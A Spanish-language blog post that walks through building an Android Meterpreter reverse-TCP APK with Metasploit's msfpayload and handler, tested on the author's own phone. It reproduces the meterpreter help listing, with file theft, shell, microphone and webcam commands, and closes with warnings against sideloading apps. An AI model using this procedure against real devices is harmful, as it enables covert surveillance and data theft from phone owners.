Hacía tiempo que no me pasaba por aquí y tenía ganas de publicar algo ya.
¿Qué mejor cosa que publicar algo referente al mundo de la telefonía y el hacking? ¿Qué hay más novedoso?
Bien pues, manos a la obra.
¿Qué necesitaremos?
- Máquina con Metasploit Framework
- Móvil Android
Aclaro que estoy usando Android 5.1 en un i9300 con la rom Resurrection Remix, por si a alguien le interesa.
Usaremos el exploit "exploit/multi/handler"
Usaremos el Payload "android/meterpreter/reverse_tcp"
Ahora asignaremos LHOST y LPORT
En LHOST asignaremos nuestra IP y en LPORT el puerto 4444
Ahora usaremos MSFPAYLOAD: msfpayload android/meterpreter/reverse_tcp LHOST=TU_IP LPORT=4444 R > FILENAME.apk
Añado como nota que pronto vamos a tener que dejar de usar msfpayload y vamos a tener que pasar a usar msfvenom.
Ahora pasaremos el apk al móvil, en la consola ejecutaremos "exploit" y ejecutaremos e instalaremos la aplicación.
En este caso mi móvil ha cerrado la sesión de meterpreter y no sé por qué, supongo que habrá detectado que es un malware y lo habrá cerrado pero se pueden hacer mil cosas con metasploit framework para que no lo detecte ni siquiera el más potente de los antivirus y si lo detecta, hay métodos manuales para no se detecte de ninguna forma.
Las opciones de meterpreter son las siguientes:
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Con este sencillo exploit y este fácil procedimiento para toda la familia podemos ver la webcam, ejecutar comandos, grabar micrófono, sacar fotos con la cámara, ver las cosas que tiene el móvil y demás así que no descarguéis e instaléis cosas que no sean de la market o puede pasaros eso.
Yo me he autoinfectado hoy pero quien sabe lo que os puede pasar mañana con algún tipo de exploit que ande por ahí.
Los comandos de meterpreter que más me llaman la atención son los de los directorios (cd, ls, download), shell, record_mic, webcam_chat, webcam_stream y webcam_snap.
Lo que me asustaría realmente sería que hubiese un exploit que diese tus coordenadas GPS, cosa que no dudo que haya ya por ahí por la red. Por algo siempre lo llevo apagado y sólo lo enciendo cuando lo necesito, a demás de ahorrar batería.
Por algo también recomiendo siempre NO llevar información confidencial, financiera y demás en ningún dispositivo electrónico, todo en papel. Es la única manera de que quede a salvo.
Esto es todo por el momento, mis pequeños padawanes.
Espero que os haya gustado esta entrada y os sirva para protegeros mejor de los black hats y la gente mala que anda por la red y quieren vuestra preciada información privada.
¡Un abrazo! ;)
0 comentarios: